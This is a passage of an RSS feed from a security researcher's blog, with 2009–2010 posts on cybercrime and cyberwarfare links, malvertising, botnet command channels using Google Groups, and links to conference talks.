<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/04/cybercrimewar-connecting-the-dots-blackhat-eu-2010/' rel='bookmark' title='Permanent Link: Cyber[Crime|War] &#8211; connecting the dots &#8211; BlackHat EU 2010'>Cyber[Crime|War] &#8211; connecting the dots &#8211; BlackHat EU 2010</a></li>
<li><a href='http://www.iamit.org/blog/2009/11/excaliburcon-summary-and-general-china-notes/' rel='bookmark' title='Permanent Link: ExcaliburCon summary and general China notes'>ExcaliburCon summary and general China notes</a></li>
<li><a href='http://www.iamit.org/blog/2010/03/new-post-on-fudsec-com-cyberfudfare/' rel='bookmark' title='Permanent Link: New post on fudsec.com &#8211; CyberFUDfare'>New post on fudsec.com &#8211; CyberFUDfare</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/03/its-all-about-the-money/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CyberCrime, CyberWarfare, and 2010</title>
		<link>http://www.iamit.org/blog/2010/01/cybercrime-cyberwarfare-and-2010/</link>
		<comments>http://www.iamit.org/blog/2010/01/cybercrime-cyberwarfare-and-2010/#comments</comments>
		<pubDate>Fri, 01 Jan 2010 16:02:37 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>
		<category><![CDATA[conference]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[cyberwarfare]]></category>
		<category><![CDATA[eCrime]]></category>
		<category><![CDATA[predictions]]></category>
		<category><![CDATA[research]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/?p=397</guid>
		<description><![CDATA[I&#8217;ll spare you the &#8220;2009 security in review&#8221; which you can read just about anywhere else you go now. I&#8217;ll also avoid the &#8220;what to expect in security in 2010&#8243; because everyone would just reiterate the same stuff they saw coming to life in 2009&#8230; What I would do is give a quick preview on [...]


Related posts:<ol><li><a href='http://www.iamit.org/blog/2009/08/cyberwarfare-and-cybercrime-more-links-turn-out-in-study/' rel='bookmark' title='Permanent Link: Cyberwarfare and Cybercrime &#8211; more links turn out in study'>Cyberwarfare and Cybercrime &#8211; more links turn out in study</a></li>
<li><a href='http://www.iamit.org/blog/2010/04/cybercrimewar-connecting-the-dots-blackhat-eu-2010/' rel='bookmark' title='Permanent Link: Cyber[Crime|War] &#8211; connecting the dots &#8211; BlackHat EU 2010'>Cyber[Crime|War] &#8211; connecting the dots &#8211; BlackHat EU 2010</a></li>
<li><a href='http://www.iamit.org/blog/2010/03/cyberfudfare-repost-from-fudsec-com/' rel='bookmark' title='Permanent Link: Cyber[FUD]Fare &#8211; repost from fudsec.com'>Cyber[FUD]Fare &#8211; repost from fudsec.com</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ll spare you the &#8220;2009 security in review&#8221; which you can read just about anywhere else you go now. I&#8217;ll also avoid the &#8220;what to expect in security in 2010&#8243; because everyone would just reiterate the same stuff they saw coming to life in 2009&#8230;</p>
<p>What I would do is give a quick preview on some areas of interest which I&#8217;m focusing on now &#8211; as you know, CyberCrime has been a big thing in terms of a research topic for me during the last few years. As expected, the simple technical stuff has been less of a focus (predictable, not so innovative), and the behind the scenes of how this whole thing works as a business and an industry have been the areas of innovation and true new insights on my part. As the research I conducted and managed chugged through, the many evidence that came to view also contained additional &#8220;leads&#8221; into areas that I have not explored firsthand before. That&#8217;s exactly what I&#8217;m knee-deep in now&#8230;</p>
<p>There have been rumors (some of them sprinkled by yours truly in my latest talks worldwide) of links between CyberCrime and nation endorsed CyberWar. In an attempt (which would hopefully not completely fail <img src='http://www.iamit.org/blog/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' />  ) to make some sense out of the materials gathered and the links mapped thus far, I&#8217;ll have something ready pretty soon for peer review (if I nagged you than now you know why&#8230;), and a more public presentation of the material (again &#8211; hopefully at some of the security conferences of 2010).</p>
<p>So, just about making it to the first post of 2010 here, have a great year, and&#8230; stay safe out there <img src='http://www.iamit.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>IA</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2009/08/cyberwarfare-and-cybercrime-more-links-turn-out-in-study/' rel='bookmark' title='Permanent Link: Cyberwarfare and Cybercrime &#8211; more links turn out in study'>Cyberwarfare and Cybercrime &#8211; more links turn out in study</a></li>
<li><a href='http://www.iamit.org/blog/2010/04/cybercrimewar-connecting-the-dots-blackhat-eu-2010/' rel='bookmark' title='Permanent Link: Cyber[Crime|War] &#8211; connecting the dots &#8211; BlackHat EU 2010'>Cyber[Crime|War] &#8211; connecting the dots &#8211; BlackHat EU 2010</a></li>
<li><a href='http://www.iamit.org/blog/2010/03/cyberfudfare-repost-from-fudsec-com/' rel='bookmark' title='Permanent Link: Cyber[FUD]Fare &#8211; repost from fudsec.com'>Cyber[FUD]Fare &#8211; repost from fudsec.com</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/01/cybercrime-cyberwarfare-and-2010/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Mapping and Security Research</title>
		<link>http://www.iamit.org/blog/2009/12/mapping-and-security-research/</link>
		<comments>http://www.iamit.org/blog/2009/12/mapping-and-security-research/#comments</comments>
		<pubDate>Fri, 04 Dec 2009 12:31:43 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>
		<category><![CDATA[eCrime]]></category>
		<category><![CDATA[malweb]]></category>
		<category><![CDATA[predictions]]></category>
		<category><![CDATA[research]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/?p=394</guid>
		<description><![CDATA[From the &#8220;We should have trademarked this&#8221; department: McAfee came out with their &#8220;Mapping the Mal Web&#8220;[PDF] report and are proving that innovation is best left for the smaller players to meddle with, only to be used later by the big guys. Not that there is anything revolutionary about the report &#8211; it&#8217;s the same [...]


Related posts:<ol><li><a href='http://www.iamit.org/blog/2009/06/getting-a-business-degree-as-part-of-security-research/' rel='bookmark' title='Permanent Link: Getting a business degree as part of Security Research?'>Getting a business degree as part of Security Research?</a></li>
<li><a href='http://www.iamit.org/blog/2009/09/malicious-ads-circa-2007/' rel='bookmark' title='Permanent Link: Malicious ads circa 2007'>Malicious ads circa 2007</a></li>
<li><a href='http://www.iamit.org/blog/2008/09/less-phish-more-meat-malweb-proving-to-be-more-efficient-than-phishing-scams/' rel='bookmark' title='Permanent Link: Less phish, more meat? Malweb proving to be more efficient than phishing scams.'>Less phish, more meat? Malweb proving to be more efficient than phishing scams.</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>From the &#8220;We should have trademarked this&#8221; department: McAfee came out with their &#8220;<a href="http://us.mcafee.com/en-us/local/docs/Mapping_Mal_Web.pdf">Mapping the Mal Web</a>&#8220;[PDF] report and are proving that innovation is best left for the smaller players to meddle with, only to be used later by the big guys.</p>
<p>Not that there is anything revolutionary about the report &#8211; it&#8217;s the same basic &#8220;look at what we could figure out from our logs&#8221; type, loaded with graphs and tables (as opposed to forward looking research, or one that dares to predict or create a disruptive technological/behavioral change). But the mere use of &#8220;MalWeb&#8221; is funny since I clearly remember starting to use it in an internal meeting some years ago back when we used to issue reports ourselves&#8230;</p>
<p>In any case &#8211; use this &#8220;with caution&#8221; (just as you would use last years financial news to base your investments on), or better yet &#8211; just use the graphs and maps to scare potential customers <img src='http://www.iamit.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  Hope that the nest report would have a somewhat beefed up sections discussing &#8220;what to look for&#8221; (a mere single paragraph here), and more discussions on the thinking of how domain names are picked by eCrime operators to reach their target audience.</p>
<p>Keep safe!</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2009/06/getting-a-business-degree-as-part-of-security-research/' rel='bookmark' title='Permanent Link: Getting a business degree as part of Security Research?'>Getting a business degree as part of Security Research?</a></li>
<li><a href='http://www.iamit.org/blog/2009/09/malicious-ads-circa-2007/' rel='bookmark' title='Permanent Link: Malicious ads circa 2007'>Malicious ads circa 2007</a></li>
<li><a href='http://www.iamit.org/blog/2008/09/less-phish-more-meat-malweb-proving-to-be-more-efficient-than-phishing-scams/' rel='bookmark' title='Permanent Link: Less phish, more meat? Malweb proving to be more efficient than phishing scams.'>Less phish, more meat? Malweb proving to be more efficient than phishing scams.</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2009/12/mapping-and-security-research/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DefCon 17 talk video available!</title>
		<link>http://www.iamit.org/blog/2009/11/defcon-17-talk-video-available/</link>
		<comments>http://www.iamit.org/blog/2009/11/defcon-17-talk-video-available/#comments</comments>
		<pubDate>Sun, 15 Nov 2009 07:13:33 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>
		<category><![CDATA[conference]]></category>
		<category><![CDATA[defcon]]></category>
		<category><![CDATA[eCrime]]></category>
		<category><![CDATA[malweb]]></category>
		<category><![CDATA[predictions]]></category>
		<category><![CDATA[research]]></category>
		<category><![CDATA[technical]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/?p=379</guid>
		<description><![CDATA[DefCon 17 talk video of my talk


Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/03/its-all-about-the-money/' rel='bookmark' title='Permanent Link: It&#8217;s all about the money'>It&#8217;s all about the money</a></li>
<li><a href='http://www.iamit.org/blog/2007/08/post-blackhat-pre-defcon/' rel='bookmark' title='Permanent Link: Post BlackHat, pre DefCon'>Post BlackHat, pre DefCon</a></li>
<li><a href='http://www.iamit.org/blog/2010/01/cybercrime-cyberwarfare-and-2010/' rel='bookmark' title='Permanent Link: CyberCrime, CyberWarfare, and 2010'>CyberCrime, CyberWarfare, and 2010</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>For your viewing pleasure &#8211; if you happened to miss out on DefCon 17 earlier this year, the full video and slides of my talk &#8220;<a href="https://media.defcon.org/dc-17/video/DEFCON%2017%20Hacking%20Conference%20Presentation%20By%20Iftach%20Ian%20Amit%20-%20Down%20the%20Rabbit%20Hole%20Uncovering%20a%20Criminal%20Server%20-%20Video%20and%20Slides.m4v">Down the Rabbit Hole &#8211; uncovering a criminal server</a>&#8221; have been uploaded to the DefCon archive page.</p>
<p>The slides and audio are also available in my section on the DefCon17 archives: <a href="http://defcon.org/html/links/dc-archives/dc-17-archive.html#Amit">http://defcon.org/html/links/dc-archives/dc-17-archive.html#Amit</a></p>
<p>Have fun!</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/03/its-all-about-the-money/' rel='bookmark' title='Permanent Link: It&#8217;s all about the money'>It&#8217;s all about the money</a></li>
<li><a href='http://www.iamit.org/blog/2007/08/post-blackhat-pre-defcon/' rel='bookmark' title='Permanent Link: Post BlackHat, pre DefCon'>Post BlackHat, pre DefCon</a></li>
<li><a href='http://www.iamit.org/blog/2010/01/cybercrime-cyberwarfare-and-2010/' rel='bookmark' title='Permanent Link: CyberCrime, CyberWarfare, and 2010'>CyberCrime, CyberWarfare, and 2010</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2009/11/defcon-17-talk-video-available/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Malicious ads circa 2007</title>
		<link>http://www.iamit.org/blog/2009/09/malicious-ads-circa-2007/</link>
		<comments>http://www.iamit.org/blog/2009/09/malicious-ads-circa-2007/#comments</comments>
		<pubDate>Tue, 29 Sep 2009 12:11:29 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>
		<category><![CDATA[advertisements]]></category>
		<category><![CDATA[Attack Vector]]></category>
		<category><![CDATA[eCrime]]></category>
		<category><![CDATA[malweb]]></category>
		<category><![CDATA[research]]></category>
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/?p=374</guid>
		<description><![CDATA[Malicious ads are plaguing the web? Not unless it's news from 2007...


Related posts:<ol><li><a href='http://www.iamit.org/blog/2007/06/malicious-space-on-myspace/' rel='bookmark' title='Permanent Link: Malicious space on MySpace'>Malicious space on MySpace</a></li>
<li><a href='http://www.iamit.org/blog/2008/01/and-the-winner-for-top-virus-of-2007-is/' rel='bookmark' title='Permanent Link: And the winner for &#8220;top virus&#8221; of 2007 is&#8230;'>And the winner for &#8220;top virus&#8221; of 2007 is&#8230;</a></li>
<li><a href='http://www.iamit.org/blog/2007/06/have-something-to-hide-make-a-lot-of-noise-about-it/' rel='bookmark' title='Permanent Link: Have something to hide? make a lot of noise about it!'>Have something to hide? make a lot of noise about it!</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Sometimes the only thing you can say about something boils down to the sound of your palm hitting your forehead. We have been seeing many ways in which criminals try to attack unsuspecting users and take over their PCs. One of which has been for quite some time the usage of advertisements as a vehicle to run malicious code on the victim&#8217;s browser &#8211; also exploiting the fact that these ads show up on the most legitimate sites.</p>
<p>Recently, I ran across an article that &#8220;exposes&#8221; such a scheme as if it was completely new (see <a href="http://www.theregister.co.uk/2009/09/24/malware_ads_google_yahoo/">Register article here</a>). My initial response was to <a href="http://twitter.com/iiamit/status/4452804713">tweet about it</a> as it reminded me of how we covered the same issue some years ago. It was late and I was trying to recall how far back was it since this coverage, and surprisingly I got it right! 2007&#8230;</p>
<p>Having been running this blog which saves all of my &#8220;historical&#8221; posts, there is even one dating back to <a href="http://www.iamit.org/blog/2007/09/widgetsadvertisements/">September 2007 here</a>, which references a report I issued for the 2nd quarter of 2007 (means it was written in May) and tracks the story published on the Q1 report (which would mean that I almost missed it and some of these were tracked back at the end of 2006). Funny story how a 3 year old news is reemerging now&#8230; For your comfort here are a couple of excerpts from the original research (find the differences&#8230;):</p>
<blockquote><p>Numerous parties are often involved in getting an ad from an advertiser to a consumer. These include advertisers, ad agencies, advertising affiliate networks, adware makers, software makers, distribution affiliates, distribution affiliate networks, and websites. This complicated network of relationships can make it difficult for advertisers to know exactly where their ads are being delivered.</p></blockquote>
<blockquote><p>As websites depend more on advertising revenues, they often display ads from third party advertising networks, over which they have little or no control. While legitimate website owners trust advertisers to display non-malicious content, advertisers sometimes “sublet” their space to others. This hierarchy can often comprise several layers, seriously compromising the level of control the website owner has over advertising content.</p></blockquote>
<p>Bottom line &#8211; same as always. If it works, no point of changing anything. Back at the time we were watching sites such as MLB.com, CNN.com and other high profile ones serve malicious ads, and today the situation is not any different. And I thought that I had to keep on the cutting edge of research to keep up in this line of business <img src='http://www.iamit.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>Keep safe!</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2007/06/malicious-space-on-myspace/' rel='bookmark' title='Permanent Link: Malicious space on MySpace'>Malicious space on MySpace</a></li>
<li><a href='http://www.iamit.org/blog/2008/01/and-the-winner-for-top-virus-of-2007-is/' rel='bookmark' title='Permanent Link: And the winner for &#8220;top virus&#8221; of 2007 is&#8230;'>And the winner for &#8220;top virus&#8221; of 2007 is&#8230;</a></li>
<li><a href='http://www.iamit.org/blog/2007/06/have-something-to-hide-make-a-lot-of-noise-about-it/' rel='bookmark' title='Permanent Link: Have something to hide? make a lot of noise about it!'>Have something to hide? make a lot of noise about it!</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2009/09/malicious-ads-circa-2007/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Down the rabbit hole all the way to Miami</title>
		<link>http://www.iamit.org/blog/2009/09/down-the-rabbit-hole-all-the-way-to-miami/</link>
		<comments>http://www.iamit.org/blog/2009/09/down-the-rabbit-hole-all-the-way-to-miami/#comments</comments>
		<pubDate>Fri, 25 Sep 2009 01:13:47 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>
		<category><![CDATA[conference]]></category>
		<category><![CDATA[cyberwarfare]]></category>
		<category><![CDATA[eCrime]]></category>
		<category><![CDATA[research]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[toolkit]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/?p=368</guid>
		<description><![CDATA[So the talk at Hacker Halted was really good &#8211; I was impressed with the quality of the audience and the presentations. As promised, I&#8217;m posting my slide deck here for your reference. Enjoy! Down_the_rabbit_Hole-Ian_Amit Related posts:Taking the Red Pill Down the Rabbit Hole ExcaliburCon summary and general China notes Cyber[Crime&#124;War] &#8211; connecting the dots [...]


Related posts:<ol><li><a href='http://www.iamit.org/blog/2008/10/taking-the-red-pill-down-the-rabbit-hole/' rel='bookmark' title='Permanent Link: Taking the Red Pill Down the Rabbit Hole'>Taking the Red Pill Down the Rabbit Hole</a></li>
<li><a href='http://www.iamit.org/blog/2009/11/excaliburcon-summary-and-general-china-notes/' rel='bookmark' title='Permanent Link: ExcaliburCon summary and general China notes'>ExcaliburCon summary and general China notes</a></li>
<li><a href='http://www.iamit.org/blog/2010/04/cybercrimewar-connecting-the-dots-blackhat-eu-2010/' rel='bookmark' title='Permanent Link: Cyber[Crime|War] &#8211; connecting the dots &#8211; BlackHat EU 2010'>Cyber[Crime|War] &#8211; connecting the dots &#8211; BlackHat EU 2010</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>So the talk at Hacker Halted was really good &#8211; I was impressed with the quality of the audience and the presentations.<br />
As promised, I&#8217;m posting my slide deck here for your reference. Enjoy!<br />
<a href="http://www.iamit.org/blog/wp-content/uploads/2009/09/Down_the_rabbit_Hole-Ian_Amit.ppt">Down_the_rabbit_Hole-Ian_Amit</a></p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2008/10/taking-the-red-pill-down-the-rabbit-hole/' rel='bookmark' title='Permanent Link: Taking the Red Pill Down the Rabbit Hole'>Taking the Red Pill Down the Rabbit Hole</a></li>
<li><a href='http://www.iamit.org/blog/2009/11/excaliburcon-summary-and-general-china-notes/' rel='bookmark' title='Permanent Link: ExcaliburCon summary and general China notes'>ExcaliburCon summary and general China notes</a></li>
<li><a href='http://www.iamit.org/blog/2010/04/cybercrimewar-connecting-the-dots-blackhat-eu-2010/' rel='bookmark' title='Permanent Link: Cyber[Crime|War] &#8211; connecting the dots &#8211; BlackHat EU 2010'>Cyber[Crime|War] &#8211; connecting the dots &#8211; BlackHat EU 2010</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2009/09/down-the-rabbit-hole-all-the-way-to-miami/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Two steps forward, one step back &#8211; controling botnets&#8230;</title>
		<link>http://www.iamit.org/blog/2009/09/two-steps-forward-one-step-back-controling-botnets/</link>
		<comments>http://www.iamit.org/blog/2009/09/two-steps-forward-one-step-back-controling-botnets/#comments</comments>
		<pubDate>Sun, 13 Sep 2009 15:12:48 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>
		<category><![CDATA[eCrime]]></category>
		<category><![CDATA[predictions]]></category>
		<category><![CDATA[research]]></category>
		<category><![CDATA[technology]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[web2.0]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/?p=364</guid>
		<description><![CDATA[Botnet communication using newsgroups is old news as web2.0 twitter and blog channels have been used for a long time.


Related posts:<ol><li><a href='http://www.iamit.org/blog/2009/12/aha-a-blast-from-the-past/' rel='bookmark' title='Permanent Link: AHA! A blast from the past&#8230;'>AHA! A blast from the past&#8230;</a></li>
<li><a href='http://www.iamit.org/blog/2009/06/getting-a-business-degree-as-part-of-security-research/' rel='bookmark' title='Permanent Link: Getting a business degree as part of Security Research?'>Getting a business degree as part of Security Research?</a></li>
<li><a href='http://www.iamit.org/blog/2010/06/identity-crisis/' rel='bookmark' title='Permanent Link: Identity crisis'>Identity crisis</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Just stumbled across this: <a href="http://www.symantec.com/connect/blogs/google-groups-trojan">http://www.symantec.com/connect/blogs/google-groups-trojan</a> &#8211; basically, botnets are utilizing Google groups (could have been any other mailing list system for the sake of argument) to communicate between the bots (trojans) and their command and control centers.</p>
<p>Funny how technology sometimes is way simpler than you imagine it would be. As per the new twitter based botnet channels, and the fancy web2.0 communications that are available for usage (see older post at <a href="http://www.iamit.org/blog/2009/08/botnet-communications-moving-to-web2-0/">here</a>), utilizing the age-old mechanism of anonymously posing messages on a newsgroup is humbling.</p>
<p>Nevertheless, it&#8217;s the same new story (Google groups were chosen because of the web interface and the uptime reputation), just dressed up in old clothes (pun intended&#8230;). The same advice that I gave 2 years ago, which I gave last year, and again 3 months ago, is still valid &#8211; forget about putting out fires (that&#8217;s your off-the-shelf AV). Focus on proper mitigation, a solution that shows you how the technology is an extension of the company&#8217;s research, and forward thinking attitude. Look for solutions that are more behavioral in nature in order to identify mal-intent communications, and act proactively based on the predictions and research done.</p>
<p>Basically &#8211; don&#8217;t settle for mediocracy!</p>
<p>Stay safe.</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2009/12/aha-a-blast-from-the-past/' rel='bookmark' title='Permanent Link: AHA! A blast from the past&#8230;'>AHA! A blast from the past&#8230;</a></li>
<li><a href='http://www.iamit.org/blog/2009/06/getting-a-business-degree-as-part-of-security-research/' rel='bookmark' title='Permanent Link: Getting a business degree as part of Security Research?'>Getting a business degree as part of Security Research?</a></li>
<li><a href='http://www.iamit.org/blog/2010/06/identity-crisis/' rel='bookmark' title='Permanent Link: Identity crisis'>Identity crisis</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2009/09/two-steps-forward-one-step-back-controling-botnets/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
